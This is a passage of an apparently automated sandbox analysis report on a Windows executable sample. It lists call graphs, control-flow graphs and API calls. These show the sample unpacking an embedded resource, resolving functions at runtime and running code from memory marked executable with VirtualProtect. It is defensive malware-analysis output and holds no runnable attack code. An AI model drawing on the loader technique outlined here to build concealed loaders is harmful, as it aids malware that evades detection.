40ed0d 15239->15334 15243 414d76 15242->15243 15244 414d59 15242->15244 15246 414dd4 15243->15246 15288 417e7e 15243->15288 15245 40bfc1 __filbuf 63 API calls 15244->15245 15247 414d5e 15245->15247 15248 40bfc1 __filbuf 63 API calls 15246->15248 15250 40e744 __filbuf 6 API calls 15247->15250 15251 414d6e 15248->15251 15250->15251 15251->15237 15253 414db5 15255 414de7 15253->15255 15256 414e12 15253->15256 15257 414dcb 15253->15257 15255->15251 15259 411c75 __malloc_crt 63 API calls 15255->15259 15256->15251 15299 414c98 15256->15299 15260 40eeab ___wtomb_environ 120 API calls 15257->15260 15262 414df7 15259->15262 15263 414dd0 15260->15263 15262->15251 15262->15256 15269 411c75 __malloc_crt 63 API calls 15262->15269 15263->15246 15263->15256 15264 414e8f 15265 414f7a 15264->15265 15270 414e98 15264->15270 15267 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15265->15267 15266 414e41 15268 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15266->15268 15267->15251 15271 414e4b 15268->15271 15269->15256 15270->15251 15272 411d54 __recalloc_crt 74 API calls 15270->15272 15274 414e51 _strlen 15271->15274 15303 411d54 15271->15303 15272->15274 15273 414f5e 15273->15251 15276 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15273->15276 15274->15251 15274->15273 15277 411cba __calloc_crt 63 API calls 15274->15277 15276->15251 15278 414efb _strlen 15277->15278 15278->15273 15279 40ef42 _strcpy_s 63 API calls 15278->15279 15280 414f14 15279->15280 15281 414f28 SetEnvironmentVariableA 15280->15281 15284 40e61c __invoke_watson 10 API calls 15280->15284 15282 414f49 15281->15282 15283 414f52 15281->15283 15286 40bfc1 __filbuf 63 API calls 15282->15286 15287 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15283->15287 15285 414f25 15284->15285 15285->15281 15286->15283 15287->15273 15308 417dc2 15288->15308 15290 414d89 15290->15246 15290->15253 15291 414cea 15290->15291 15292 414d3b 15291->15292 15293 414cfb 15291->15293 15292->15253 15294 411cba __calloc_crt 63 API calls 15293->15294 15295 414d12 15294->15295 15296 40e79a __amsg_exit 63 API calls 15295->15296 15298 414d24 15295->15298 15296->15298 15298->15292 15315 417d6d 15298->15315 15302 414ca6 15299->15302 15300 414ccd 15300->15264 15300->15266 15301 40edfb __fassign 107 API calls 15301->15302 15302->15300 15302->15301 15307 411d5d 15303->15307 15305 411da0 15305->15274 15306 411d81 Sleep 15306->15307 15307->15305 15307->15306 15323 40b783 15307->15323 15309 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15308->15309 15310 417dd6 15309->15310 15311 40bfc1 __filbuf 63 API calls 15310->15311 15314 417df4 __mbschr_l 15310->15314 15312 417de4 15311->15312 15313 40e744 __filbuf 6 API calls 15312->15313 15313->15314 15314->15290 15316 417d7e _strlen 15315->15316 15322 417d7a 15315->15322 15317 40b84d _malloc 63 API calls 15316->15317 15318 417d91 15317->15318 15319 40ef42 _strcpy_s 63 API calls 15318->15319 15318->15322 15320 417da3 15319->15320 15321 40e61c __invoke_watson 10 API calls 15320->15321 15320->15322 15321->15322 15322->15298 15324 40b792 15323->15324 15325 40b7ba 15323->15325 15324->15325 15326 40b79e 15324->15326 15327 40b7cf 15325->15327 15329 40e56a __msize 64 API calls 15325->15329 15328 40bfc1 __filbuf 63 API calls 15326->15328 15330 40e34f _realloc 72 API calls 15327->15330 15331 40b7a3 15328->15331 15329->15327 15333 40b7b3 _memset 15330->15333 15332 40e744 __filbuf 6 API calls 15331->15332 15332->15333 15333->15307 15335 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15334->15335 15336 40ed21 15335->15336 15337 40ed42 15336->15337 15339 40ed75 15336->15339 15350 40ed2a 15336->15350 15338 40bfc1 __filbuf 63 API calls 15337->15338 15342 40ed47 15338->15342 15340 40ed99 15339->15340 15341 40ed7f 15339->15341 15344 40eda1 15340->15344 15345 40edb5 15340->15345 15343 40bfc1 __filbuf 63 API calls 15341->15343 15346 40e744 __filbuf 6 API calls 15342->15346 15347 40ed84 15343->15347 15352 414b9e 15344->15352 15372 414b5c 15345->15372 15346->15350 15351 40e744 __filbuf 6 API calls 15347->15351 15350->15224 15351->15350 15353 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15352->15353 15354 414bb2 15353->15354 15355 414bd3 15354->15355 15356 414c06 15354->15356 15370 414bbb 15354->15370 15357 40bfc1 __filbuf 63 API calls 15355->15357 15358 414c10 15356->15358 15359 414c2a 15356->15359 15360 414bd8 15357->15360 15362 40bfc1 __filbuf 63 API calls 15358->15362 15363 414c34 15359->15363 15364 414c49 15359->15364 15361 40e744 __filbuf 6 API calls 15360->15361 15361->15370 15366 414c15 15362->15366 15377 417c1d 15363->15377 15365 414b5c ___crtCompareStringA 96 API calls 15364->15365 15368 414c63 15365->15368 15369 40e744 __filbuf 6 API calls 15366->15369 15368->15370 15371 40bfc1 __filbuf 63 API calls 15368->15371 15369->15370 15370->15350 15371->15370 15373 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15372->15373 15374 414b6f 15373->15374 15393 4147ec 15374->15393 15378 417c33 15377->15378 15388 417c58 ___ascii_strnicmp 15377->15388 15379 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15378->15379 15380 417c3e 15379->15380 15381 417c43 15380->15381 15383 417c78 15380->15383 15382 40bfc1 __filbuf 63 API calls 15381->15382 15384 417c48 15382->15384 15385 417c82 15383->15385 15392 417caa 15383->15392 15386 40e744 __filbuf 6 API calls 15384->15386 15387 40bfc1 __filbuf 63 API calls 15385->15387 15386->15388 15389 417c87 15387->15389 15388->15370 15390 40e744 __filbuf 6 API calls 15389->15390 15390->15388 15391 4168fc 98 API calls __tolower_l 15391->15392 15392->15388 15392->15391 15394 414818 CompareStringW 15393->15394 15398 41482f strncnt 15393->15398 15395 41483b GetLastError 15394->15395 15394->15398 15395->15398 15396 40ce09 ___ansicp 5 API calls 15399 414b5a 15396->15399 15397 414a95 15400 417a20 ___ansicp 87 API calls 15397->15400 15398->15397 15401 4148a4 15398->15401 15406 414881 15398->15406 15399->15350 15402 414abb 15400->15402 15403 414962 MultiByteToWideChar 15401->15403 15401->15406 15407 4148e6 GetCPInfo 15401->15407 15404 414b1c CompareStringA 15402->15404 15402->15406 15408 417a69 ___convertcp 70 API calls 15402->15408 15403->15406 15414 414982 15403->15414 15405 414b3a 15404->15405 15404->15406 15409 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15405->15409 15406->15396 15407->15406 15410 4148f7 15407->15410 15411 414ae0 15408->15411 15412 414b40 15409->15412 15410->15403 15410->15406 15411->15406 15418 417a69 ___convertcp 70 API calls 15411->15418 15416 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15412->15416 15413 4149d9 MultiByteToWideChar 15417 4149f2 MultiByteToWideChar 15413->15417 15432 414a83 15413->15432 15415 40b84d _malloc 63 API calls 15414->15415 15423 41499f __crtGetStringTypeA_stat 15414->15423 15415->15423 15416->15406 15426 414a09 15417->15426 15417->15432 15419 414b01 15418->15419 15421 414b16 15419->15421 15422 414b0a 15419->15422 15420 4147ae __freea 63 API calls 15420->15406 15421->15404 15425 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15422->15425 15423->15406 15423->15413 15424 414a1f __crtGetStringTypeA_stat 15427 414a53 MultiByteToWideChar 15424->15427 15424->15432 15425->15406 15426->15424 15428 40b84d _malloc 63 API calls 15426->15428 15429 414a66 CompareStringW 15427->15429 15430 414a7d 15427->15430 15428->15424 15429->15430 15431 4147ae __freea 63 API calls 15430->15431 15431->15432 15432->15420 15433->15228 15440 40d0f5 15434->15440 15437 40cd39 15438 40cd62 15437->15438 15439 40cd6e RaiseException 15437->15439 15438->15439 15439->15189 15441 40af59 15440->15441 15442 40d115 _strlen 15440->15442 15441->15437 15442->15441 15443 40b84d _malloc 63 API calls 15442->15443 15444 40d128 15443->15444 15444->15441 15445 40ef42 _strcpy_s 63 API calls 15444->15445 15445->15441 15447 4017e9 15446->15447 15450 40b783 __recalloc 73 API calls 15447->15450 15452 401844 15447->15452 15453 40182d 15447->15453 15448 40b6b5 ___crtGetEnvironmentStringsA 63 API calls 15448->15452 15450->15453 15451 40186d MultiByteToWideChar 15451->15195 15451->15196 15452->15451 15456 40b743 15452->15456 15453->15448 15453->15452 15455 40103a 15454->15455 15457 40e231 __calloc_impl 63 API calls 15456->15457 15458 40b75d 15457->15458 15459 40b779 15458->15459 15460 40bfc1 __filbuf 63 API calls 15458->15460 15459->15452 15461 40b770 15460->15461 15461->15459 15462 40bfc1 __filbuf 63 API calls 15461->15462 15462->15459 15464 40b6b5 __fsopen 15463->15464 15465 40b714 HeapFree 15464->15465 15467 40b73d __fsopen 15464->15467 15466 40b727 15465->15466 15465->15467 15468 40bfc1 __filbuf 63 API calls 15466->15468 15467->15210 15468->15467 15470 40aff8 15469->15470 15471 40b01f __VEC_memcpy 15470->15471 15472 40b027 15470->15472 15471->15472 15472->15219 15474 40e8ea __fsopen 15473->15474 15475 40d6e0 __lock 63 API calls 15474->15475 15476 40e8f1 15475->15476 15477 40e9ba __initterm 15476->15477 15478 40e91d 15476->15478 15492 40e9f5 15477->15492 15480 4104e9 __decode_pointer 6 API calls 15478->15480 15482 40e928 15480->15482 15484 40e9aa __initterm 15482->15484 15486 4104e9 __decode_pointer 6 API calls 15482->15486 15483 40e9f2 __fsopen 15483->14257 15484->15477 15491 40e93d 15486->15491 15487 40e9e9 15488 40e7ee __mtinitlocknum 4 API calls 15487->15488 15488->15483 15489 4104e0 6 API calls _raise 15489->15491 15490 4104e9 6 API calls __decode_pointer 15490->15491 15491->15484 15491->15489 15491->15490 15493 40e9d6 15492->15493 15494 40e9fb 15492->15494 15493->15483 15496 40d606 LeaveCriticalSection 15493->15496 15497 40d606 LeaveCriticalSection 15494->15497 15496->15487 15497->15493

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 13 401c73-401c77 8->13 15 401c93-401c95 13->15 16 401c79-401c7b 13->16 21 401c98-401c9a 15->21 19 401c7d-401c83 16->19 20 401c8f-401c91 16->20 19->15 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->13 23->20 34 401cd0-401cd4 24->34 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 39 401f1c-401f2f 30->39 40 401f5f-401f69 30->40 36 401cf0-401cf2 34->36 37 401cd6-401cd8 34->37 38 401cf5-401cf7 36->38 41 401cda-401ce0 37->41 42 401cec-401cee 37->42 38->25 44 401cf9-401d09 Module32Next 38->44 45 401f33-401f5d call 401560 39->45 46 401f73-401f75 40->46 47 401f6b-401f72 40->47 41->36 43 401ce2-401cea 41->43 42->38 43->34 43->42 44->7 50 401d0f 44->50 45->40 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 46->48 49 401f77-401f8d call 401560 46->49 47->46 48->5 87 4021aa-4021c0 48->87 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 71 401d42-401d4a 66->71 67->68 68->25 69 401d5d-401d7b call 401650 68->69 76 401d80-401d84 69->76 71->61 71->67 78 401da0-401da2 76->78 79 401d86-401d88 76->79 83 401da5-401da7 78->83 81 401d8a-401d90 79->81 82 401d9c-401d9e 79->82 81->78 85 401d92-401d9a 81->85 82->83 83->25 86 401dad-401dbd Module32Next 83->86 85->76 85->82 86->7 86->54 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 20dd01d 122->154 155 40234e call 20dd006 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 20dd01d 135->152 153 402390 call 20dd006 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00401DC4
                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                • _memset.LIBCMT ref: 00401EDD
                                                                                                                                • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                • API String ID: 1430744539-2962942730
                                                                                                                                • Opcode ID: 224088bd6fdf40f00aacdd5f7db7c03047c3cc993abb63ba2c7175de51848a6e
                                                                                                                                • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                • Opcode Fuzzy Hash: 224088bd6fdf40f00aacdd5f7db7c03047c3cc993abb63ba2c7175de51848a6e
                                                                                                                                • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 166 401991 call 401030 164->166 166->162
                                                                                                                                APIs
                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3322701435-0
                                                                                                                                • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 169 40af66-40af6e 170 40af7d-40af88 call 40b84d 169->170 173 40af70-40af7b call 40d2e3 170->173 174 40af8a-40af8b 170->174 173->170 177 40af8c-40af98 173->177 178 40afb3-40afca call 40af49 call 40cd39 177->178 179 40af9a-40afb2 call 40aefc call 40d2bd 177->179 179->178
                                                                                                                                APIs
                                                                                                                                • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                  • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1411284514-0
                                                                                                                                • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 239 40e7ee-40e7f6 call 40e7c3 241 40e7fb-40e7ff ExitProcess 239->241
                                                                                                                                APIs
                                                                                                                                • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                  • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                  • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                  • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2427264223-0
                                                                                                                                • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 306 21896d0-2189751 VirtualProtect 309 218975a-218977f 306->309 310 2189753-2189759 306->310 310->309
                                                                                                                                APIs
                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02189744
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2243972291.0000000002180000.00000040.00000800.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_2180000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                • Opcode ID: 9c533b52095138890283eacbba88c16ddb5df5754ce6f28fb7b29f926724dfd4
                                                                                                                                • Instruction ID: 2bc2d9ad376a7ae7c4fd6fc932827d80cc5b66891de572192dc0075fb0d5efbb
                                                                                                                                • Opcode Fuzzy Hash: 9c533b52095138890283eacbba88c16ddb5df5754ce6f28fb7b29f926724dfd4
                                                                                                                                • Instruction Fuzzy Hash: E51106B1D002499FDB10DFAAC584AEEFBF4FF48314F10842AE519A7250CB78A944CFA1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 400 401870-401883 call 40af66 403 4018b2 400->403 404 401885-4018a2 SysAllocString 400->404 405 4018b4-4018b8 403->405 404->405 406 4018a4-4018a6 404->406 408 4018c4-4018c9 405->408 409 4018ba-4018bf call 40ad90 405->409 406->405 407 4018a8-4018ad call 40ad90 406->407 407->403 409->408
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocString_malloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 959018026-0
                                                                                                                                • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 412 40d534-40d556 HeapCreate 413 40d558-40d559 412->413 414 40d55a-40d563 412->414
                                                                                                                                APIs
                                                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 10892065-0
                                                                                                                                • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
